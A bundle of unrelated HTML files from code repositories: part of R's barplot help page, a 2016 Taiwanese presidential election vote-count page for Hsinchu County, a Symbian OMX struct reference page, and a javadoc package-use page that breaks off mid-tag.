</pre> <h3>Arguments</h3> <table summary="R argblock"> <tr valign="top"><td><code>height</code></td> <td> <p>either a vector or matrix of values describing the bars which make up the plot. If <code>height</code> is a vector, the plot consists of a sequence of rectangular bars with heights given by the values in the vector. If <code>height</code> is a matrix and <code>beside</code> is <code>FALSE</code> then each bar of the plot corresponds to a column of <code>height</code>, with the values in the column giving the heights of stacked sub-bars making up the bar. If <code>height</code> is a matrix and <code>beside</code> is <code>TRUE</code>, then the values in each column are juxtaposed rather than stacked.</p> </td></tr> <tr valign="top"><td><code>width</code></td> <td> <p>optional vector of bar widths. Re-cycled to length the number of bars drawn. Specifying a single value will have no visible effect unless <code>xlim</code> is specified.</p> </td></tr> <tr valign="top"><td><code>space</code></td> <td> <p>the amount of space (as a fraction of the average bar width) left before each bar. May be given as a single number or one number per bar. If <code>height</code> is a matrix and <code>beside</code> is <code>TRUE</code>, <code>space</code> may be specified by two numbers, where the first is the space between bars in the same group, and the second the space between the groups. If not given explicitly, it defaults to <code>c(0,1)</code> if <code>height</code> is a matrix and <code>beside</code> is <code>TRUE</code>, and to 0.2 otherwise.</p> </td></tr> <tr valign="top"><td><code>names.arg</code></td> <td> <p>a vector of names to be plotted below each bar or group of bars. If this argument is omitted, then the names are taken from the <code>names</code> attribute of <code>height</code> if this is a vector, or the column names if it is a matrix.</p> </td></tr> <tr valign="top"><td><code>legend.text</code></td> <td> <p>a vector of text used to construct a legend for the plot, or a logical indicating whether a legend should be included. This is only useful when <code>height</code> is a matrix. In that case given legend labels should correspond to the rows of <code>height</code>; if <code>legend.text</code> is true, the row names of <code>height</code> will be used as labels if they are non-null.</p> </td></tr> <tr valign="top"><td><code>beside</code></td> <td> <p>a logical value. If <code>FALSE</code>, the columns of <code>height</code> are portrayed as stacked bars, and if <code>TRUE</code> the columns are portrayed as juxtaposed bars.</p> </td></tr> <tr valign="top"><td><code>horiz</code></td> <td> <p>a logical value. If <code>FALSE</code>, the bars are drawn vertically with the first bar to the left. If <code>TRUE</code>, the bars are drawn horizontally with the first at the bottom.</p> </td></tr> <tr valign="top"><td><code>density</code></td> <td> <p>a vector giving the density of shading lines, in lines per inch, for the bars or bar components. The default value of <code>NULL</code> means that no shading lines are drawn. Non-positive values of <code>density</code> also inhibit the drawing of shading lines.</p> </td></tr> <tr valign="top"><td><code>angle</code></td> <td> <p>the slope of shading lines, given as an angle in degrees (counter-clockwise), for the bars or bar components.</p> </td></tr> <tr valign="top"><td><code>col</code></td> <td> <p>a vector of colors for the bars or bar components. By default, grey is used if <code>height</code> is a vector, and a gamma-corrected grey palette if <code>height</code> is a matrix.</p> </td></tr> <tr valign="top"><td><code>border</code></td> <td> <p>the color to be used for the border of the bars. Use <code>border = NA</code> to omit borders. If there are shading lines, <code>border = TRUE</code> means use the same colour for the border as for the shading lines.</p> </td></tr> <tr valign="top"><td><code>main,sub</code></td> <td> <p>overall and sub title for the plot.</p> </td></tr> <tr valign="top"><td><code>xlab</code></td> <td> <p>a label for the x axis.</p> </td></tr> <tr valign="top"><td><code>ylab</code></td> <td> <p>a label for the y axis.</p> </td></tr> <tr valign="top"><td><code>xlim</code></td> <td> <p>limits for the x axis.</p> </td></tr> <tr valign="top"><td><code>ylim</code></td> <td> <p>limits for the y axis.</p> </td></tr> <tr valign="top"><td><code>xpd</code></td> <td> <p>logical. Should bars be allowed to go outside region?</p> </td></tr> <tr valign="top"><td><code>log</code></td> <td> <p>string specifying if axis scales should be logarithmic; see <code><a href="plot.default.html">plot.default</a></code>.</p> </td></tr> <tr valign="top"><td><code>axes</code></td> <td> <p>logical. If <code>TRUE</code>, a vertical (or horizontal, if <code>horiz</code> is true) axis is drawn.</p> </td></tr> <tr valign="top"><td><code>axisnames</code></td> <td> <p>logical. If <code>TRUE</code>, and if there are <code>names.arg</code> (see above), the other axis is drawn (with <code>lty = 0</code>) and labeled.</p> </td></tr> <tr valign="top"><td><code>cex.axis</code></td> <td> <p>expansion factor for numeric axis labels.</p> </td></tr> <tr valign="top"><td><code>cex.names</code></td> <td> <p>expansion factor for axis names (bar labels).</p> </td></tr> <tr valign="top"><td><code>inside</code></td> <td> <p>logical. If <code>TRUE</code>, the lines which divide adjacent (non-stacked!) bars will be drawn. Only applies when <code>space = 0</code> (which it partly is when <code>beside = TRUE</code>).</p> </td></tr> </table> <table summary="R argblock"> <tr valign="top"><td><code>plot</code></td> <td> <p>logical. If <code>FALSE</code>, nothing is plotted.</p> </td></tr> <tr valign="top"><td><code>axis.lty</code></td> <td> <p>the graphics parameter <code>lty</code> applied to the axis and tick marks of the categorical (default horizontal) axis. Note that by default the axis is suppressed.</p> </td></tr> <tr valign="top"><td><code>offset</code></td> <td> <p>a vector indicating how much the bars should be shifted relative to the x axis.</p> </td></tr> <tr valign="top"><td><code>add</code></td> <td> <p>logical specifying if bars should be added to an already existing plot; defaults to <code>FALSE</code>.</p> </td></tr> <tr valign="top"><td><code>ann</code></td> <td> <p>logical specifying if the default annotation (<code>main</code>, <code>sub</code>, <code>xlab</code>, <code>ylab</code>) should appear on the plot, see <code><a href="title.html">title</a></code>.</p> </td></tr> <tr valign="top"><td><code>args.legend</code></td> <td> <p>list of additional arguments to pass to <code><a href="legend.html">legend</a>()</code>; names of the list are used as argument names. Only used if <code>legend.text</code> is supplied.</p> </td></tr> <tr valign="top"><td><code>formula</code></td> <td> <p>a formula where the <code>y</code> variables are numeric data to plot against the categorical <code>x</code> variables. The formula can have one of three forms: </p> <pre> y ~ x y ~ x1 + x2 cbind(y1, y2) ~ x</pre><p>, see the examples.</p> </td></tr> <tr valign="top"><td><code>data</code></td> <td> <p>a data frame (or list) from which the variables in formula should be taken.</p> </td></tr> <tr valign="top"><td><code>subset</code></td> <td> <p>an optional vector specifying a subset of observations to be used.</p> </td></tr> <tr valign="top"><td><code>na.action</code></td> <td> <p>a function which indicates what should happen when the data contain <code><a href="../../base/html/NA.html">NA</a></code> values. The default is to ignore missing values in the given variables.</p> </td></tr> <tr valign="top"><td><code>...</code></td> <td> <p>arguments to be passed to/from other methods. For the default method these can include further arguments (such as <code>axes</code>, <code>asp</code> and <code>main</code>) and <a href="par.html">graphical parameters</a> (see <code><a href="par.html">par</a></code>) which are passed to <code><a href="plot.window.html">plot.window</a>()</code>, <code><a href="title.html">title</a>()</code> and <code><a href="axis.html">axis</a></code>.</p> </td></tr> </table> <h3>Value</h3> <p>A numeric vector (or matrix, when <code>beside = TRUE</code>), say <code>mp</code>, giving the coordinates of <em>all</em> the bar midpoints drawn, useful for adding to the graph. </p> <p>If <code>beside</code> is true, use <code>colMeans(mp)</code> for the midpoints of each <em>group</em> of bars, see example. </p> <h3>Author(s)</h3> <p>R Core, with a contribution by Arni Magnusson.</p> <h3>References</h3> <p>Becker, R. A., Chambers, J. M. and Wilks, A. R. (1988) <em>The New S Language</em>. Wadsworth &amp; Brooks/Cole. </p> <p>Murrell, P. (2005) <em>R Graphics</em>. Chapman &amp; Hall/CRC Press. </p> <h3>See Also</h3> <p><code><a href="plot.html">plot</a>(..., type = "h")</code>, <code><a href="dotchart.html">dotchart</a></code>; <code><a href="hist.html">hist</a></code> for bars of a <em>continuous</em> variable. <code><a href="mosaicplot.html">mosaicplot</a>()</code>, more sophisticated to visualize <em>several</em> categorical variables. </p> <h3>Examples</h3> <pre> # Formula method barplot(GNP ~ Year, data = longley) barplot(cbind(Employed, Unemployed) ~ Year, data = longley) ## 3rd form of formula - 2 categories : op &lt;- par(mfrow = 2:1, mgp = c(3,1,0)/2, mar = .1+c(3,3:1)) summary(d.Titanic &lt;- as.data.frame(Titanic)) barplot(Freq ~ Class + Survived, data = d.Titanic, subset = Age == "Adult" &amp; Sex == "Male", main = "barplot(Freq ~ Class + Survived, *)", ylab = "# {passengers}", legend = TRUE) # Corresponding table : (xt &lt;- xtabs(Freq ~ Survived + Class + Sex, d.Titanic, subset = Age=="Adult")) # Alternatively, a mosaic plot : mosaicplot(xt[,,"Male"], main = "mosaicplot(Freq ~ Class + Survived, *)", color=TRUE) par(op) # Default method require(grDevices) # for colours tN &lt;- table(Ni &lt;- stats::rpois(100, lambda = 5)) r &lt;- barplot(tN, col = rainbow(20)) #- type = "h" plotting *is* 'bar'plot lines(r, tN, type = "h", col = "red", lwd = 2) barplot(tN, space = 1.5, axisnames = FALSE, sub = "barplot(..., space= 1.5, axisnames = FALSE)") barplot(VADeaths, plot = FALSE) barplot(VADeaths, plot = FALSE, beside = TRUE) mp &lt;- barplot(VADeaths) # default tot &lt;- colMeans(VADeaths) text(mp, tot + 3, format(tot), xpd = TRUE, col = "blue") barplot(VADeaths, beside = TRUE, col = c("lightblue", "mistyrose", "lightcyan", "lavender", "cornsilk"), legend = rownames(VADeaths), ylim = c(0, 100)) title(main = "Death Rates in Virginia", font.main = 4) hh &lt;- t(VADeaths)[, 5:1] mybarcol &lt;- "gray20" mp &lt;- barplot(hh, beside = TRUE, col = c("lightblue", "mistyrose", "lightcyan", "lavender"), legend = colnames(VADeaths), ylim = c(0,100), main = "Death Rates in Virginia", font.main = 4, sub = "Faked upper 2*sigma error bars", col.sub = mybarcol, cex.names = 1.5) segments(mp, hh, mp, hh + 2*sqrt(1000*hh/100), col = mybarcol, lwd = 1.5) stopifnot(dim(mp) == dim(hh)) # corresponding matrices mtext(side = 1, at = colMeans(mp), line = -2, text = paste("Mean", formatC(colMeans(hh))), col = "red") # Bar shading example barplot(VADeaths, angle = 15+10*1:5, density = 20, col = "black", legend = rownames(VADeaths)) title(main = list("Death Rates in Virginia", font = 4)) # Border color barplot(VADeaths, border = "dark blue") # Log scales (not much sense here) barplot(tN, col = heat.colors(12), log = "y") barplot(tN, col = gray.colors(20), log = "xy") # Legend location barplot(height = cbind(x = c(465, 91) / 465 * 100, y = c(840, 200) / 840 * 100, z = c(37, 17) / 37 * 100), beside = FALSE, width = c(465, 840, 37), col = c(1, 2), legend.text = c("A", "B"), args.legend = list(x = "topleft")) </pre> <hr /><div style="text-align: center;">[Package <em>graphics</em> version 3.6.1 <a href="00Index.html">Index</a>]</div> </body></html>
data/president/n701000000000000/20160116101526/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 新竹縣 得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">2,647</td> <td class="tdAlignRight">37.7765</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">2,862</td> <td class="tdAlignRight">40.8449</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">1,498</td> <td class="tdAlignRight">21.3786</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;22/385&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 18:15:11 +0800" title="Sat, 16 Jan 2016 18:15:11 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;18:15:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
pdk/GUID-595A68A1-E3DE-3E1C-88AA-82EE4E028BA0.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxStruct"/> <meta name="DC.Title" content="OMX_CONFIG_SCALEFACTORTYPE"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-595A68A1-E3DE-3E1C-88AA-82EE4E028BA0"/> <title>OMX_CONFIG_SCALEFACTORTYPE</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-595A68A1-E3DE-3E1C-88AA-82EE4E028BA0"><a name="GUID-595A68A1-E3DE-3E1C-88AA-82EE4E028BA0"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2578593 id2865498 id2471143 id2471148 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">OMX_CONFIG_SCALEFACTORTYPE Struct Reference</h1> <table class="signature"><tr><td>struct OMX_CONFIG_SCALEFACTORTYPE</td></tr></table><div class="section"><div> <p>Structure defining percent to scale each frame dimension. For example: To make the width 50% larger, use fWidth = 1.5 and to make the width 1/2 the original size, use fWidth = 0.5 </p> </div></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Attributes</th></tr></thead><tbody><tr><td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_U32</a> </td><td><a href="#GUID-D4D38CF7-8DB9-30E9-B428-024FAFA5F64E">nPortIndex</a></td></tr><tr class="bg"><td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_U32</a> </td><td><a href="#GUID-E2D8D73F-D3D5-34B8-B20E-6CF4E2BCBE68">nSize</a></td></tr><tr><td align="right" valign="top"> <a href="GUID-4B49A214-0F5A-39FD-8BD5-EF023B1F0B3B.html">OMX_VERSIONTYPE</a> </td><td><a href="#GUID-ECF4B649-A352-35C8-BD23-0DB6433C083A">nVersion</a></td></tr><tr class="bg"><td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_S32</a> </td><td><a href="#GUID-89326B27-B620-355C-9916-EA1963BC042E">xHeight</a></td></tr><tr><td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_S32</a> </td><td><a href="#GUID-730E46A9-5585-3DA0-8A4D-A4E257394101">xWidth</a></td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Data Documentation</h1><div class="nested1" id="GUID-D4D38CF7-8DB9-30E9-B428-024FAFA5F64E"><a name="GUID-D4D38CF7-8DB9-30E9-B428-024FAFA5F64E"><!-- --></a> <h2 class="topictitle2"> OMX_U32 nPortIndex</h2> <table class="signature"><tr><td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_U32</a> </td><td>nPortIndex</td></tr></table><div class="section"><div> <p>Port that this struct applies to </p> </div></div> </div> <div class="nested1" id="GUID-E2D8D73F-D3D5-34B8-B20E-6CF4E2BCBE68"><a name="GUID-E2D8D73F-D3D5-34B8-B20E-6CF4E2BCBE68"><!-- --></a> <h2 class="topictitle2"> OMX_U32 nSize</h2> <table class="signature"><tr><td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_U32</a> </td><td>nSize</td></tr></table><div class="section"><div> <p>Size of the structure in bytes </p> </div></div> </div> <div class="nested1" id="GUID-ECF4B649-A352-35C8-BD23-0DB6433C083A"><a name="GUID-ECF4B649-A352-35C8-BD23-0DB6433C083A"><!-- --></a> <h2 class="topictitle2"> OMX_VERSIONTYPE nVersion</h2> <table class="signature"><tr><td> <a href="GUID-4B49A214-0F5A-39FD-8BD5-EF023B1F0B3B.html">OMX_VERSIONTYPE</a> </td><td>nVersion</td></tr></table><div class="section"><div> <p>OMX specification version info </p> </div></div> </div> <div class="nested1" id="GUID-89326B27-B620-355C-9916-EA1963BC042E"><a name="GUID-89326B27-B620-355C-9916-EA1963BC042E"><!-- --></a> <h2 class="topictitle2"> OMX_S32 xHeight</h2> <table class="signature"><tr><td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_S32</a> </td><td>xHeight</td></tr></table><div class="section"><div> <p>Fixed point value stored as Q16 </p> </div></div> </div> <div class="nested1" id="GUID-730E46A9-5585-3DA0-8A4D-A4E257394101"><a name="GUID-730E46A9-5585-3DA0-8A4D-A4E257394101"><!-- --></a> <h2 class="topictitle2"> OMX_S32 xWidth</h2> <table class="signature"><tr><td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html">OMX_S32</a> </td><td>xWidth</td></tr></table><div class="section"><div> <p>Fixed point value stored as Q16 </p> </div></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
SPLAR/doc/splar/core/util/hypergraphs/package-use.html
SINTEF-9012/SPLCATool
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_18) on Mon Feb 08 23:29:08 EST 2010 --> <TITLE> Uses of Package splar.core.util.hypergraphs </TITLE> <META NAME="date" CONTENT="2010-02-08"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package splar.core.util.hypergraphs"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?splar/core/util/hypergraphs/package-use.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Package<br>splar.core.util.hypergraphs</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../splar/core/util/hypergraphs/package-summary.html">splar.core.util.hypergraphs</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#splar.core.constraints"><B>splar.core.constraints</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#splar.core.fm.clustering"><B>splar.core.fm.clustering</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#splar.core.util.hypergraphs"><B>splar.core.util.hypergraphs</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="splar.core.constraints"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Classes in <A HREF="../../../../splar/core/util/hypergraphs/package-summary.html">splar.core.util.hypergraphs</A> used by <A HREF="../../../../splar/core/constraints/package-summary.html">splar.core.constraints</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../splar/core/util/hypergraphs/class-use/Hypergraph.html#splar.core.constraints"><B>Hypergraph</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="splar.core.fm.clustering"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Classes in <A HREF="../../../../splar/core/util/hypergraphs/package-summary.html">splar.core.util.hypergraphs</A> used by <A HREF="../../../../splar/core/fm/clustering/package-summary.html">splar.core.fm.clustering</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../splar/core/util/hypergraphs/class-use/Hypergraph.html#splar.core.fm.clustering"><B>Hypergraph</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="splar.core.util.hypergraphs"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Classes in <A HREF="../../../../splar/core/util/hypergraphs/package-summary.html">splar.core.util.hypergraphs</A> used by <A HREF="../../../../splar/core/util/hypergraphs/package-summary.html">splar.core.util.hypergraphs</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../splar/core/util/hypergraphs/class-use/Hyperedge.html#splar.core.util.hypergraphs"><B>Hyperedge</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../splar/core/util/hypergraphs/class-use/Hypergraph.html#splar.core.util.hypergraphs"><B>Hypergraph</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../splar/core/util/hypergraphs/class-use/Vertex.html#splar.core.util.hypergraphs"><B>Vertex</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" 